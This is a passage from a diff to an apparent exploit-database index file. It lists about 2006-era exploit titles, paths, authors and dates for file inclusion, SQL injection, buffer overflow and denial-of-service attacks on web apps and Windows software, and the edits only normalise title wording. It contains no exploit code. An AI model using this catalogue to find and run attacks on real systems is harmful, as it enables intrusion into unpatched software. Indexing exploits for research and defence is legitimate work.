Avariento",multiple,dos,0 2238,platforms/windows/dos/2238.html,"Microsoft Internet Explorer Multiple COM Object Color Property DoS",2006-08-21,nop,windows,dos,0 -2239,platforms/php/webapps/2239.txt,"Empire CMS <= 3.7 - (checklevel.php) Remote File Include",2006-08-22,"Bob Linuson",php,webapps,0 -2240,platforms/php/webapps/2240.txt,"HPE <= 1.0 - (HPEinc) Remote File Include Vulnerabilities (2)",2006-08-22,"the master",php,webapps,0 +2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - (checklevel.php) Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 +2240,platforms/php/webapps/2240.txt,"HPE 1.0 - (HPEinc) Remote File Inclusion Vulnerabilities (2)",2006-08-22,"the master",php,webapps,0 2241,platforms/solaris/local/2241.c,"Solaris 10 sysinfo(2) - Local Kernel Memory Disclosure Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 2242,platforms/solaris/local/2242.sh,"Solaris 8 / 9 - (/usr/ucb/ps) Local Information Leak Exploit",2006-08-22,"Marco Ivaldi",solaris,local,0 -2243,platforms/php/webapps/2243.php,"Simple Machines Forum <= 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 -2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox <= 1.5.0.6 - (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0 +2243,platforms/php/webapps/2243.php,"Simple Machines Forum 1.1 rc2 Lock Topics Remote Exploit",2006-08-22,rgod,php,webapps,0 +2244,platforms/multiple/dos/2244.pl,"Mozilla Firefox 1.5.0.6 - (FTP Request) Remote Denial of Service Exploit",2006-08-22,"Tomas Kempinsky",multiple,dos,0 2245,platforms/windows/dos/2245.pl,"MDaemon POP3 Server < 9.06 - (USER) Remote Buffer Overflow PoC",2006-08-22,"Leon Juranic",windows,dos,0 2246,platforms/hardware/dos/2246.cpp,"2Wire Modems/Routers CRLF - Denial of Service Exploit",2006-08-22,preth00nker,hardware,dos,0 -2247,platforms/php/webapps/2247.php,"MercuryBoard <= 1.1.4 - (User-Agent) Remote SQL Injection Exploit",2006-08-23,rgod,php,webapps,0 -2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod <= 1.5.0 - (start) Remote SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0 -2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Include",2006-08-23,"Mehmet Ince",php,webapps,0 -2250,platforms/php/webapps/2250.pl,"Integramod Portal <= 2.x - (functions_portal.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 -2251,platforms/php/webapps/2251.pl,"VistaBB <= 2.x - (functions_mod_user.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 +2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - (User-Agent) SQL Injection Exploit",2006-08-23,rgod,php,webapps,0 +2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - (start) SQL Injection Exploit",2006-08-23,SpiderZ,php,webapps,0 +2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - (lvc_include_dir) Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 +2250,platforms/php/webapps/2250.pl,"Integramod Portal 2.x - (functions_portal.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 +2251,platforms/php/webapps/2251.pl,"VistaBB 2.x - (functions_mod_user.php) Remote Include Exploit",2006-08-23,nukedx,php,webapps,0 2252,platforms/php/webapps/2252.pl,"Wikepage Opus 10 <= 2006.2a (lng) - Remote Command Execution Exploit",2006-08-24,Hessam-x,php,webapps,0 -2253,platforms/php/webapps/2253.php,"Phaos <= 0.9.2 basename() Remote Command Execution Exploit",2006-08-24,Kacper,php,webapps,0 +2253,platforms/php/webapps/2253.php,"Phaos 0.9.2 basename() Remote Command Execution Exploit",2006-08-24,Kacper,php,webapps,0 2254,platforms/php/webapps/2254.txt,"phpCOIN 1.2.3 - (session_set.php) Remote Include",2006-08-24,Timq,php,webapps,0 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass",2006-08-25,Vipsta,php,webapps,0 -2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 - (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0 -2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 +2256,platforms/php/webapps/2256.txt,"Integramod Portal 2.0 rc2 - (phpbb_root_path) Remote File Inclusion",2006-08-25,MATASANOS,php,webapps,0 +2257,platforms/php/webapps/2257.txt,"CliServ Web Community 0.65 - (cl_headers) Include",2006-08-25,Kacper,php,webapps,0 2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110 -2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 - (note.php) Remote SQL Injection",2006-08-26,Kacper,php,webapps,0 -2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 - (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0 -2261,platforms/php/webapps/2261.php,"iziContents <= RC6 - GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0 -2262,platforms/php/webapps/2262.php,"CMS Frogss <= 0.4 - (podpis) Remote SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0 -2263,platforms/php/webapps/2263.txt,"Ay System CMS <= 2.6 - (main.php) Remote File Include",2006-08-27,SHiKaA,php,webapps,0 +2259,platforms/php/webapps/2259.txt,"proManager 0.73 - (note.php) SQL Injection",2006-08-26,Kacper,php,webapps,0 +2260,platforms/php/webapps/2260.pl,"AlberT-EasySite 1.0a5 - (PSA_PATH) Remote File Inclusion Exploit",2006-08-27,Kacper,php,webapps,0 +2261,platforms/php/webapps/2261.php,"iziContents RC6 - GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0 +2262,platforms/php/webapps/2262.php,"CMS Frogss 0.4 - (podpis) SQL Injection Exploit",2006-08-27,Kacper,php,webapps,0 +2263,platforms/php/webapps/2263.txt,"Ay System CMS 2.6 - (main.php) Remote File Inclusion",2006-08-27,SHiKaA,php,webapps,0 2264,platforms/windows/local/2264.htm,"VMware 5.5.1 - (ActiveX) Local Buffer Overflow Exploit",2006-08-27,c0ntex,windows,local,0 2265,platforms/windows/remote/2265.c,"Microsoft Windows - NetpIsRemote() Remote Overflow Exploit (MS06-040) (2)",2006-08-28,ub3rst4r,windows,remote,445 2266,platforms/cgi/webapps/2266.txt,"Cybozu Products (id) Arbitrary File Retrieval",2006-08-28,"Tan Chew Keong",cgi,webapps,0 -2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple Remote SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0 +2267,platforms/cgi/webapps/2267.txt,"Cybuzu Garoon 2.1.0 - Multiple SQL Injection Vulnerabilities",2006-08-28,"Tan Chew Keong",cgi,webapps,0 2268,platforms/php/webapps/2268.php,"e107 <= 0.75 - (GLOBALS Overwrite) Remote Code Execution Exploit",2006-08-28,rgod,php,webapps,0 -2269,platforms/php/webapps/2269.txt,"Web3news <= 0.95 - (PHPSECURITYADMIN_PATH) Remote Include",2006-08-28,SHiKaA,php,webapps,0 -2270,platforms/php/webapps/2270.php,"phpGroupWare <= 0.9.16.010 - GLOBALS[] Remote Code Execution Exploit",2006-08-29,Kacper,php,webapps,0 -2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum <= 2.1.5 - (chemin) Remote Include",2006-08-29,"Mehmet Ince",php,webapps,0 -2272,platforms/php/webapps/2272.txt,"MiniBill <= 1.22b - config[plugin_dir] Remote File Inclusion Vulnerabilities",2006-08-29,"the master",php,webapps,0 -2273,platforms/php/webapps/2273.txt,"ExBB Italiano <= 0.2 - exbb[home_path] Remote File Include",2006-08-29,SHiKaA,php,webapps,0 -2274,platforms/linux/remote/2274.c,"Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit",2006-08-29,Expanders,linux,remote,0 -2275,platforms/php/webapps/2275.txt,"phpECard <= 2.1.4 - (functions.php) Remote File Include",2006-08-29,LeAk,php,webapps,0 -2276,platforms/windows/remote/2276.pm,"IBM eGatherer <= 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 -2277,platforms/windows/remote/2277.c,"Streamripper <= 1.61.25 - HTTP Header Parsing Buffer Overflow Exploit (2)",2006-08-29,psylocn,windows,remote,0 +2269,platforms/php/webapps/2269.txt,"Web3news 0.95 - (PHPSECURITYADMIN_PATH) Remote Include",2006-08-28,SHiKaA,php,webapps,0 +2270,platforms/php/webapps/2270.php,"phpGroupWare 0.9.16.010 - GLOBALS[] Remote Code Execution Exploit",2006-08-29,Kacper,php,webapps,0 +2271,platforms/php/webapps/2271.txt,"PortailPHP mod_phpalbum 2.1.5 - (chemin) Remote Include",2006-08-29,"Mehmet Ince",php,webapps,0 +2272,platforms/php/webapps/2272.txt,"MiniBill 1.22b - config[plugin_dir] Remote File Inclusion Vulnerabilities",2006-08-29,"the master",php,webapps,0 +2273,platforms/php/webapps/2273.txt,"ExBB Italiano 0.2 - exbb[home_path] Remote File Inclusion",2006-08-29,SHiKaA,php,webapps,0 +2274,platforms/linux/remote/2274.c,"Streamripper 1.61.25 HTTP Header Parsing Buffer Overflow Exploit",2006-08-29,Expanders,linux,remote,0 +2275,platforms/php/webapps/2275.txt,"phpECard 2.1.4 - (functions.php) Remote File Inclusion",2006-08-29,LeAk,php,webapps,0 +2276,platforms/windows/remote/2276.pm,"IBM eGatherer 3.20.0284.0 - (ActiveX) Remote Code Execution Exploit (Metasploit)",2006-08-29,"Francisco Amato",windows,remote,0 +2277,platforms/windows/remote/2277.c,"Streamripper 1.61.25 - HTTP Header Parsing Buffer Overflow Exploit (2)",2006-08-29,psylocn,windows,remote,0 2278,platforms/windows/local/2278.cpp,"ZipCentral 4.01 - ZIP File Handling Local Buffer Overflow Exploit",2006-08-30,bratax,windows,local,0 -2279,platforms/php/webapps/2279.txt,"phpAtm <= 1.21 - (include_location) Remote File Include Vulnerabilities",2006-08-30,KinSize,php,webapps,0 -2280,platforms/php/webapps/2280.pl,"Lanifex DMO <= 2.3b (_incMgr) Remote File Include Exploit",2006-08-30,Kacper,php,webapps,0 -2281,platforms/php/webapps/2281.pl,"Pheap CMS <= 1.1 - (lpref) Remote File Include Exploit",2006-08-31,Kacper,php,webapps,0 -2282,platforms/php/webapps/2282.txt,"YACS CMS <= 6.6.1 - context[path_to_root] Remote File Include",2006-08-31,MATASANOS,php,webapps,0 -2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous <= 7.4.11 - (add router) Remote BoF Exploit",2006-09-01,"Andres Tarasco",windows,remote,0 -2284,platforms/windows/local/2284.c,"TIBCO Rendezvous <= 7.4.11 Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 +2279,platforms/php/webapps/2279.txt,"phpAtm 1.21 - (include_location) Remote File Inclusion Vulnerabilities",2006-08-30,KinSize,php,webapps,0 +2280,platforms/php/webapps/2280.pl,"Lanifex DMO 2.3b (_incMgr) Remote File Inclusion Exploit",2006-08-30,Kacper,php,webapps,0 +2281,platforms/php/webapps/2281.pl,"Pheap CMS 1.1 - (lpref) Remote File Inclusion Exploit",2006-08-31,Kacper,php,webapps,0 +2282,platforms/php/webapps/2282.txt,"YACS CMS 6.6.1 - context[path_to_root] Remote File Inclusion",2006-08-31,MATASANOS,php,webapps,0 +2283,platforms/windows/remote/2283.c,"TIBCO Rendezvous 7.4.11 - (add router) Remote BoF Exploit",2006-09-01,"Andres Tarasco",windows,remote,0 +2284,platforms/windows/local/2284.c,"TIBCO Rendezvous 7.4.11 Password Extractor Local Exploit",2006-09-01,"Andres Tarasco",windows,local,0 2285,platforms/php/webapps/2285.txt,"MyBace Light (login_check.php) Remote File",2006-09-01,"Philipp Niedziela",php,webapps,0 -2286,platforms/windows/local/2286.cpp,"PowerZip <= 7.06.3895 Long Filename Handling Buffer Overflow Exploit",2006-09-01,bratax,windows,local,0 -2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - (YID) Remote SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps,0 -2288,platforms/php/webapps/2288.php,"TikiWiki <= 1.9 Sirius (jhot.php) Remote Command Execution Exploit",2006-09-02,rgod,php,webapps,0 -2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - Remote SQL Injection Exploit",2006-09-02,DarkFig,php,webapps,0 -2290,platforms/php/webapps/2290.txt,"Dyncms <= Release 6 - (x_admindir) Remote File Include",2006-09-02,SHiKaA,php,webapps,0 -2291,platforms/php/webapps/2291.php,"PmWiki <= 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 -2292,platforms/php/webapps/2292.txt,"yappa-ng <= 2.3.1 - (admin_modules) Remote File Include",2006-09-03,SHiKaA,php,webapps,0 -2293,platforms/php/webapps/2293.txt,"FlashChat <= 4.5.7 - (aedating4CMS.php) Remote File Include",2006-09-04,NeXtMaN,php,webapps,0 -2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) Remote SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 -2295,platforms/php/webapps/2295.txt,"In-link <= 2.3.4 - (ADODB_DIR) Remote File Include Vulnerabilities",2006-09-04,"Saudi Hackrz",php,webapps,0 -2296,platforms/asp/webapps/2296.txt,"SimpleBlog <= 2.3 - (id) Remote SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 +2286,platforms/windows/local/2286.cpp,"PowerZip 7.06.3895 Long Filename Handling Buffer Overflow Exploit",2006-09-01,bratax,windows,local,0 +2287,platforms/asp/webapps/2287.txt,"icblogger 2.0 - (YID) SQL Injection",2006-09-01,"Chironex Fleckeri",asp,webapps,0 +2288,platforms/php/webapps/2288.php,"TikiWiki 1.9 Sirius (jhot.php) Remote Command Execution Exploit",2006-09-02,rgod,php,webapps,0 +2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection Exploit",2006-09-02,DarkFig,php,webapps,0 +2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 +2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 +2292,platforms/php/webapps/2292.txt,"yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 +2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - (aedating4CMS.php) Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 +2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 +2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion Vulnerabilities",2006-09-04,"Saudi Hackrz",php,webapps,0 +2296,platforms/asp/webapps/2296.txt,"SimpleBlog 2.3 - (id) SQL Injection",2006-09-04,Vipsta/MurderSkillz,asp,webapps,0 2297,platforms/php/webapps/2297.pl,"Tr Forum 2.0 - SQL Injection / Bypass Security Restriction Exploit",2006-09-04,DarkFig,php,webapps,0 -2298,platforms/php/webapps/2298.php,"pHNews <= alpha 1 - (templates_dir) Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 -2299,platforms/php/webapps/2299.php,"PHP Proxima <= 6 - completepack Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 +2298,platforms/php/webapps/2298.php,"pHNews alpha 1 - (templates_dir) Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 +2299,platforms/php/webapps/2299.php,"PHP Proxima 6 - completepack Remote Code Execution Exploit",2006-09-04,Kacper,php,webapps,0 2300,platforms/php/webapps/2300.pl,"SoftBB 0.1 - (cmd) Remote Command Execution Exploit",2006-09-04,DarkFig,php,webapps,0 -2301,platforms/php/webapps/2301.txt,"MySpeach <= 3.0.2 - (my_ms[root]) Remote File Include",2006-09-05,SHiKaA,php,webapps,0 +2301,platforms/php/webapps/2301.txt,"MySpeach 3.0.2 - (my_ms[root]) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 2302,platforms/windows/dos/2302.pl,"J. River Media Center 11.0.309 - Remote Denial of Service PoC",2006-09-05,n00b,windows,dos,0 -2303,platforms/multiple/dos/2303.html,"dsock <= 1.3 - (buf) Remote Buffer Overflow PoC",2006-09-05,DaveK,multiple,dos,0 -2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 - (page) Remote File Include",2006-09-05,"Kurdish Security",php,webapps,0 -2305,platforms/php/webapps/2305.txt,"AnnonceV News Script <= 1.1 - (page) Remote File Include",2006-09-05,"Kurdish Security",php,webapps,0 -2306,platforms/asp/webapps/2306.txt,"Zix Forum <= 1.12 - (RepId) Remote SQL Injection",2006-09-05,"Chironex Fleckeri",asp,webapps,0 -2307,platforms/php/webapps/2307.txt,"ACGV News <= 0.9.1 - (PathNews) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 -2308,platforms/php/webapps/2308.txt,"C-News <= 1.0.1 - (path) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 -2309,platforms/php/webapps/2309.txt,"Sponge News <= 2.2 - (sndir) Remote File Include",2006-09-05,SHiKaA,php,webapps,0 -2310,platforms/php/webapps/2310.php,"PhpCommander <= 3.0 - (upload) Remote Code Execution Exploit",2006-09-05,Kacper,php,webapps,0 -2311,platforms/php/webapps/2311.txt,"phpBB Shadow Premod <= 2.7.1 - Remote File Include",2006-09-06,Kw3[R]Ln,php,webapps,0 -2312,platforms/php/webapps/2312.txt,"BinGo News <= 3.01 - (bnrep) Remote File Include",2006-09-06,SHiKaA,php,webapps,0 -2313,platforms/php/webapps/2313.txt,"phpFullAnnu <= 5.1 - (repmod) Remote File Include",2006-09-06,SHiKaA,php,webapps,0 -2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 - (Core.php) Remote File Include",2006-09-06,"the master",php,webapps,0 -2315,platforms/php/webapps/2315.txt,"Akarru <= 0.4.3.34 - (bm_content) Remote File Include",2006-09-06,ddoshomo,php,webapps,0 -2316,platforms/php/webapps/2316.txt,"PayProCart <= 1146078425 - Multiple Remote File Include Vulnerabilities",2006-09-07,momo26,php,webapps,0 -2317,platforms/php/webapps/2317.txt,"SL_Site <= 1.0 - (spaw_root) Remote File Include",2006-09-07,Kw3[R]Ln,php,webapps,0 +2303,platforms/multiple/dos/2303.html,"dsock 1.3 - (buf) Remote Buffer Overflow PoC",2006-09-05,DaveK,multiple,dos,0 +2304,platforms/php/webapps/2304.txt,"GrapAgenda 0.1 - (page) Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0 +2305,platforms/php/webapps/2305.txt,"AnnonceV News Script 1.1 - (page) Remote File Inclusion",2006-09-05,"Kurdish Security",php,webapps,0 +2306,platforms/asp/webapps/2306.txt,"Zix Forum 1.12 - (RepId) SQL Injection",2006-09-05,"Chironex Fleckeri",asp,webapps,0 +2307,platforms/php/webapps/2307.txt,"ACGV News 0.9.1 - (PathNews) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 +2308,platforms/php/webapps/2308.txt,"C-News 1.0.1 - (path) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 +2309,platforms/php/webapps/2309.txt,"Sponge News 2.2 - (sndir) Remote File Inclusion",2006-09-05,SHiKaA,php,webapps,0 +2310,platforms/php/webapps/2310.php,"PhpCommander 3.0 - (upload) Remote Code Execution Exploit",2006-09-05,Kacper,php,webapps,0 +2311,platforms/php/webapps/2311.txt,"phpBB Shadow Premod 2.7.1 - Remote File Inclusion",2006-09-06,Kw3[R]Ln,php,webapps,0 +2312,platforms/php/webapps/2312.txt,"BinGo News 3.01 - (bnrep) Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 +2313,platforms/php/webapps/2313.txt,"phpFullAnnu 5.1 - (repmod) Remote File Inclusion",2006-09-06,SHiKaA,php,webapps,0 +2314,platforms/php/webapps/2314.txt,"Beautifier 0.1 - (Core.php) Remote File Inclusion",2006-09-06,"the master",php,webapps,0 +2315,platforms/php/webapps/2315.txt,"Akarru 0.4.3.34 - (bm_content) Remote File Inclusion",2006-09-06,ddoshomo,php,webapps,0 +2316,platforms/php/webapps/2316.txt,"PayProCart 1146078425 - Multiple Remote File Inclusion Vulnerabilities",2006-09-07,momo26,php,webapps,0 +2317,platforms/php/webapps/2317.txt,"SL_Site 1.0 - (spaw_root) Remote File Inclusion",2006-09-07,Kw3[R]Ln,php,webapps,0 2318,platforms/php/webapps/2318.txt,"Web Server Creator 0.1 - (l) Remote Include",2006-09-07,"Mehmet Ince",php,webapps,0 -2319,platforms/php/webapps/2319.txt,"Fire Soft Board <= RC 3 - (racine) Remote File Include",2006-09-07,ddoshomo,php,webapps,0 +2319,platforms/php/webapps/2319.txt,"Fire Soft Board RC 3 - (racine) Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 2320,platforms/windows/remote/2320.txt,"IBM Director < 5.10 - (Redirect.bat) Directory Transversal",2006-09-07,"Daniel Clemens",windows,remote,411 -2321,platforms/php/webapps/2321.php,"DokuWiki <= 2006-03-09b (dwpage.php) Remote Code Execution Exploit",2006-09-07,rgod,php,webapps,0 -2322,platforms/php/webapps/2322.php,"DokuWiki <= 2006-03-09b (dwpage.php) System Disclosure Exploit",2006-09-07,rgod,php,webapps,0 -2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - (Include) Remote File Include Vulnerabilities",2006-09-07,"the master",php,webapps,0 -2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - (PathNews) Remote File Include",2006-09-07,ddoshomo,php,webapps,0 -2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Include Vulnerabilities",2006-09-07,ddoshomo,php,webapps,0 -2326,platforms/php/webapps/2326.txt,"WM-News <= 0.5 - Multiple Remote File Include Vulnerabilities",2006-09-07,ddoshomo,php,webapps,0 -2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery <= 1.52 - (dir_path) Remote File Include Vulnerabilities",2006-09-07,"Saudi Hackrz",php,webapps,0 +2321,platforms/php/webapps/2321.php,"DokuWiki 2006-03-09b (dwpage.php) Remote Code Execution Exploit",2006-09-07,rgod,php,webapps,0 +2322,platforms/php/webapps/2322.php,"DokuWiki 2006-03-09b (dwpage.php) System Disclosure Exploit",2006-09-07,rgod,php,webapps,0 +2323,platforms/php/webapps/2323.txt,"PhpNews 1.0 - (Include) Remote File Inclusion Vulnerabilities",2006-09-07,"the master",php,webapps,0 +2324,platforms/php/webapps/2324.txt,"ACGV News 0.9.1 - (PathNews) Remote File Inclusion",2006-09-07,ddoshomo,php,webapps,0 +2325,platforms/php/webapps/2325.txt,"News Evolution 3.0.3 - _NE[AbsPath] Remote File Inclusion Vulnerabilities",2006-09-07,ddoshomo,php,webapps,0 +2326,platforms/php/webapps/2326.txt,"WM-News 0.5 - Multiple Remote File Inclusion Vulnerabilities",2006-09-07,ddoshomo,php,webapps,0 +2327,platforms/php/webapps/2327.txt,"PhotoKorn Gallery 1.52 - (dir_path) Remote File Inclusion Vulnerabilities",2006-09-07,"Saudi Hackrz",php,webapps,0 2328,platforms/windows/remote/2328.php,"RaidenHTTPD 1.1.49 - (SoftParserFileXml) Remote Code Execution Exploit",2006-09-08,rgod,windows,remote,80 -2329,platforms/php/webapps/2329.txt,"Somery <= 0.4.6 - (skin_dir) Remote File Include",2006-09-08,basher13,php,webapps,0 +2329,platforms/php/webapps/2329.txt,"Somery 0.4.6 - (skin_dir) Remote File Inclusion",2006-09-08,basher13,php,webapps,0 2330,platforms/solaris/local/2330.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc) (1)",2006-09-08,"RISE Security",solaris,local,0 2331,platforms/solaris/local/2331.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/x86)",2006-09-08,"RISE Security",solaris,local,0 2332,platforms/sco/local/2332.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (sco/x86)",2006-09-08,"RISE Security",sco,local,0 -2333,platforms/php/webapps/2333.php,"CCleague Pro <= 1.0.1RC1 - (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0 -2334,platforms/windows/dos/2334.py,"Multithreaded TFTP <= 1.1 - (Long Get Request) Denial of Service Exploit",2006-09-08,n00b,windows,dos,0 -2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb <= 1.0.3 - (base) Remote File Include Vulnerabilities",2006-09-08,ddoshomo,php,webapps,0 -2336,platforms/php/webapps/2336.pl,"Socketwiz Bookmarks <= 2.0 - (root_dir) Remote File Include Exploit",2006-09-09,Kacper,php,webapps,0 -2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager <= 3.2 - (id) Remote SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 -2338,platforms/linux/local/2338.c,"openmovieeditor <= 0.0.20060901 - (name) Local Buffer Overflow Exploit",2006-09-09,Qnix,linux,local,0 -2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager <= 3.2 - (classified_path) File Include",2006-09-09,MercilessTurk,php,webapps,0 -2340,platforms/php/webapps/2340.txt,"PUMA <= 1.0 RC 2 - (config.php) Remote File Include",2006-09-10,"Philipp Niedziela",php,webapps,0 -2341,platforms/php/webapps/2341.txt,"Open Bulletin Board <= 1.0.8 - (root_path) File Include",2006-09-10,Eddy_BAck0o,php,webapps,0 -2342,platforms/php/webapps/2342.txt,"mcGalleryPRO <= 2006 - (path_to_folder) Remote Include",2006-09-10,Solpot,php,webapps,0 -2343,platforms/php/webapps/2343.txt,"MiniPort@l <= 0.1.5 beta (skiny) Remote File Include",2006-09-11,Kacper,php,webapps,0 -2344,platforms/php/webapps/2344.txt,"OPENi-CMS <= 1.0.1beta (config) Remote File Include",2006-09-11,basher13,php,webapps,0 +2333,platforms/php/webapps/2333.php,"CCleague Pro 1.0.1RC1 - (Cookie) Remote Code Execution Exploit",2006-09-08,Kacper,php,webapps,0 +2334,platforms/windows/dos/2334.py,"Multithreaded TFTP 1.1 - (Long Get Request) Denial of Service Exploit",2006-09-08,n00b,windows,dos,0 +2335,platforms/php/webapps/2335.txt,"MyABraCaDaWeb 1.0.3 - (base) Remote File Inclusion Vulnerabilities",2006-09-08,ddoshomo,php,webapps,0 +2336,platforms/php/webapps/2336.pl,"Socketwiz Bookmarks 2.0 - (root_dir) Remote File Inclusion Exploit",2006-09-09,Kacper,php,webapps,0 +2337,platforms/php/webapps/2337.txt,"Vivvo Article Manager 3.2 - (id) SQL Injection",2006-09-09,MercilessTurk,php,webapps,0 +2338,platforms/linux/local/2338.c,"openmovieeditor 0.0.20060901 - (name) Local Buffer Overflow Exploit",2006-09-09,Qnix,linux,local,0 +2339,platforms/php/webapps/2339.txt,"Vivvo Article Manager 3.2 - (classified_path) File Include",2006-09-09,MercilessTurk,php,webapps,0 +2340,platforms/php/webapps/2340.txt,"PUMA 1.0 RC 2 - (config.php) Remote File Inclusion",2006-09-10,"Philipp Niedziela",php,webapps,0 +2341,platforms/php/webapps/2341.txt,"Open Bulletin Board 1.0.8 - (root_path) File Include",2006-09-10,Eddy_BAck0o,php,webapps,0 +2342,platforms/php/webapps/2342.txt,"mcGalleryPRO 2006 - (path_to_folder) Remote Include",2006-09-10,Solpot,php,webapps,0 +2343,platforms/php/webapps/2343.txt,"MiniPort@l 0.1.5 beta (skiny) Remote File Inclusion",2006-09-11,Kacper,php,webapps,0 +2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta (config) Remote File Inclusion",2006-09-11,basher13,php,webapps,0 2345,platforms/windows/remote/2345.pl,"Mercur Mailserver 5.0 SP3 - (IMAP) Remote Buffer Overflow Exploit (2)",2006-09-11,"Jacopo Cervini",windows,remote,143 -2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a (include_path) Remote File Include",2006-09-11,ddoshomo,php,webapps,0 +2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a (include_path) Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - (include/XSS) Remote Vulnerabilities",2006-09-11,s3rv3r_hack3r,php,webapps,0 -2348,platforms/php/webapps/2348.pl,"phpBB <= 2.0.21 - (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 -2349,platforms/php/webapps/2349.txt,"phpBB XS <= 0.58 - (functions.php) Remote File Include",2006-09-12,AzzCoder,php,webapps,0 -2350,platforms/php/webapps/2350.txt,"p4CMS <= 1.05 - (abs_pfad) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 -2351,platforms/php/webapps/2351.txt,"Popper <= 1.41-r2 - (form) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 -2352,platforms/php/webapps/2352.txt,"webSPELL <= 4.01.01 Database Backup Download",2006-09-12,Trex,php,webapps,0 -2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded <= 1.0.6-r3 - Remote File Include",2006-09-12,CeNGiZ-HaN,php,webapps,0 -2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook <= 1.3 - (dir_path) Remote File Include",2006-09-12,SHiKaA,php,webapps,0 